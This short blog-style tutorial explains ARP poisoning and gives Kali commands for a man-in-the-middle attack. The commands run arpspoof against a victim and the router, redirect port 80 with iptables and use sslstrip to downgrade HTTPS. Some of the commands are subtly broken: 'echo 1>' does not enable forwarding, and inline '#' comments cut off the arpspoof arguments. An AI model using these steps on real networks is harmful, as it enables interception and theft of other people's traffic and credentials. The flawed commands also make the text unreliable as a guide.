Poison that ARP
What is ARP poisoning?
ARP or Address Resolution Protocol is the protocol that will tell computers the corresponding MAC address of an IP address. In Routing and switching, when a packet is sent to a host outside the local subnet, a Layer 3 device is needed to route the package to the destination. The destination MAC address of a packet will always be next hop in this situation, and the L3 device will change the L3 header accordingly.
ARP poisoning is done by tricking the victim that the attackers PC is the router, thus forwarding all traffic to him instead of to the router. The attacker will work as a proxy, forwarding all the traffic to the router and back, so it would appear that traffic is flowing normally, except of course it isn’t, all traffic is getting routed through the attacker first, so he can inspect and even change packets if he wishes.
Execute ARP poisoning
for this we use Kali:
echo 1> /proc/sys/net/ipv4/ip_forward #enables IP forwarding
# this will tell the victim to forward packets to the attacker instead of the router
arpspoof -i eth0 #internet interface -t 6.6.6.6 #targetIP 6.6.6.254 #router
# this will tell the router the attacker is actually the victim computer
arpspoof -i eth0 -t 6.6.6.254 6.6.6.6
this is great, but urlsnarf or drift won’t work with HTTPS requests, in order to bypass this we can use SSLstrip this will force HTTP upon the victim, but if the website uses HSTS it won’t work.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <myPort>
sslstrip -l <myPort>